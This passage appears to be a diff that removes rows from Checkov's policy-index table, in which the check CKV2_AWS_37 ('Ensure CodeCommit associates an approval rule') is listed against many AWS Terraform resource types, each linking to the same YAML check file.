-|  831 | CKV2_AWS_37     | resource | aws_glue_security_configuration                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  832 | CKV2_AWS_37     | resource | aws_glue_trigger                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  833 | CKV2_AWS_37     | resource | aws_glue_workflow                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  834 | CKV2_AWS_37     | resource | aws_guardduty_detector                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  835 | CKV2_AWS_37     | resource | aws_guardduty_invite_accepter                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  836 | CKV2_AWS_37     | resource | aws_guardduty_ipset                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  837 | CKV2_AWS_37     | resource | aws_guardduty_member                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  838 | CKV2_AWS_37     | resource | aws_guardduty_organization_admin_account                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  839 | CKV2_AWS_37     | resource | aws_guardduty_organization_configuration                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  840 | CKV2_AWS_37     | resource | aws_guardduty_threatintelset                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  841 | CKV2_AWS_37     | resource | aws_iam_access_key                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  842 | CKV2_AWS_37     | resource | aws_iam_account_alias                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  843 | CKV2_AWS_37     | resource | aws_iam_account_password_policy                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  844 | CKV2_AWS_37     | resource | aws_iam_group                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  845 | CKV2_AWS_37     | resource | aws_iam_group_membership                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  846 | CKV2_AWS_37     | resource | aws_iam_group_policy                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  847 | CKV2_AWS_37     | resource | aws_iam_group_policy_attachment                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  848 | CKV2_AWS_37     | resource | aws_iam_instance_profile                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  849 | CKV2_AWS_37     | resource | aws_iam_openid_connect_provider                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  850 | CKV2_AWS_37     | resource | aws_iam_policy                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  851 | CKV2_AWS_37     | resource | aws_iam_policy_attachment                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  852 | CKV2_AWS_37     | resource | aws_iam_policy_document                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  853 | CKV2_AWS_37     | resource | aws_iam_role                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  854 | CKV2_AWS_37     | resource | aws_iam_role_policy                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  855 | CKV2_AWS_37     | resource | aws_iam_role_policy_attachment                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  856 | CKV2_AWS_37     | resource | aws_iam_saml_provider                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  857 | CKV2_AWS_37     | resource | aws_iam_server_certificate                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  858 | CKV2_AWS_37     | resource | aws_iam_service_linked_role                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  859 | CKV2_AWS_37     | resource | aws_iam_user                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  860 | CKV2_AWS_37     | resource | aws_iam_user_group_membership                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  861 | CKV2_AWS_37     | resource | aws_iam_user_login_profile                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  862 | CKV2_AWS_37     | resource | aws_iam_user_policy                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  863 | CKV2_AWS_37     | resource | aws_iam_user_policy_attachment                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  864 | CKV2_AWS_37     | resource | aws_iam_user_ssh_key                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  865 | CKV2_AWS_37     | resource | aws_inspector_assessment_target                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  866 | CKV2_AWS_37     | resource | aws_inspector_assessment_template                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  867 | CKV2_AWS_37     | resource | aws_inspector_resource_group                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  868 | CKV2_AWS_37     | resource | aws_instance                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  869 | CKV2_AWS_37     | resource | aws_internet_gateway                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  870 | CKV2_AWS_37     | resource | aws_iot_certificate                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  871 | CKV2_AWS_37     | resource | aws_iot_policy                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  872 | CKV2_AWS_37     | resource | aws_iot_policy_attachment                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  873 | CKV2_AWS_37     | resource | aws_iot_role_alias                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  874 | CKV2_AWS_37     | resource | aws_iot_thing                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  875 | CKV2_AWS_37     | resource | aws_iot_thing_principal_attachment                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  876 | CKV2_AWS_37     | resource | aws_iot_thing_type                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  877 | CKV2_AWS_37     | resource | aws_iot_topic_rule                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  878 | CKV2_AWS_37     | resource | aws_key_pair                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  879 | CKV2_AWS_37     | resource | aws_kinesis_analytics_application                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  880 | CKV2_AWS_37     | resource | aws_kinesis_firehose_delivery_stream                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  881 | CKV2_AWS_37     | resource | aws_kinesis_stream                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  882 | CKV2_AWS_37     | resource | aws_kinesis_video_stream                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  883 | CKV2_AWS_37     | resource | aws_kms_alias                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  884 | CKV2_AWS_37     | resource | aws_kms_ciphertext                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  885 | CKV2_AWS_37     | resource | aws_kms_external_key                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  886 | CKV2_AWS_37     | resource | aws_kms_grant                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  887 | CKV2_AWS_37     | resource | aws_kms_key                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  888 | CKV2_AWS_37     | resource | aws_lambda_alias                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  889 | CKV2_AWS_37     | resource | aws_lambda_event_source_mapping                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  890 | CKV2_AWS_37     | resource | aws_lambda_function                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  891 | CKV2_AWS_37     | resource | aws_lambda_function_event_invoke_config                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  892 | CKV2_AWS_37     | resource | aws_lambda_layer_version                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  893 | CKV2_AWS_37     | resource | aws_lambda_permission                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  894 | CKV2_AWS_37     | resource | aws_lambda_provisioned_concurrency_config               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  895 | CKV2_AWS_37     | resource | aws_launch_configuration                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  896 | CKV2_AWS_37     | resource | aws_launch_template                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  897 | CKV2_AWS_37     | resource | aws_lb                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  898 | CKV2_AWS_37     | resource | aws_lb_cookie_stickiness_policy                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  899 | CKV2_AWS_37     | resource | aws_lb_listener                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  900 | CKV2_AWS_37     | resource | aws_lb_listener_certificate                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  901 | CKV2_AWS_37     | resource | aws_lb_listener_rule                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  902 | CKV2_AWS_37     | resource | aws_lb_ssl_negotiation_policy                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  903 | CKV2_AWS_37     | resource | aws_lb_target_group                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  904 | CKV2_AWS_37     | resource | aws_lb_target_group_attachment                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  905 | CKV2_AWS_37     | resource | aws_licensemanager_association                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  906 | CKV2_AWS_37     | resource | aws_licensemanager_license_configuration                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  907 | CKV2_AWS_37     | resource | aws_lightsail_domain                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  908 | CKV2_AWS_37     | resource | aws_lightsail_instance                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  909 | CKV2_AWS_37     | resource | aws_lightsail_key_pair                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  910 | CKV2_AWS_37     | resource | aws_lightsail_static_ip                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  911 | CKV2_AWS_37     | resource | aws_lightsail_static_ip_attachment                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  912 | CKV2_AWS_37     | resource | aws_load_balancer_backend_server_policy                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  913 | CKV2_AWS_37     | resource | aws_load_balancer_listener_policy                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  914 | CKV2_AWS_37     | resource | aws_load_balancer_policy                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  915 | CKV2_AWS_37     | resource | aws_macie_member_account_association                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  916 | CKV2_AWS_37     | resource | aws_macie_s3_bucket_association                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  917 | CKV2_AWS_37     | resource | aws_main_route_table_association                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  918 | CKV2_AWS_37     | resource | aws_media_convert_queue                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  919 | CKV2_AWS_37     | resource | aws_media_package_channel                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  920 | CKV2_AWS_37     | resource | aws_media_store_container                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  921 | CKV2_AWS_37     | resource | aws_media_store_container_policy                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  922 | CKV2_AWS_37     | resource | aws_mq_broker                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  923 | CKV2_AWS_37     | resource | aws_mq_configuration                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  924 | CKV2_AWS_37     | resource | aws_msk_cluster                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
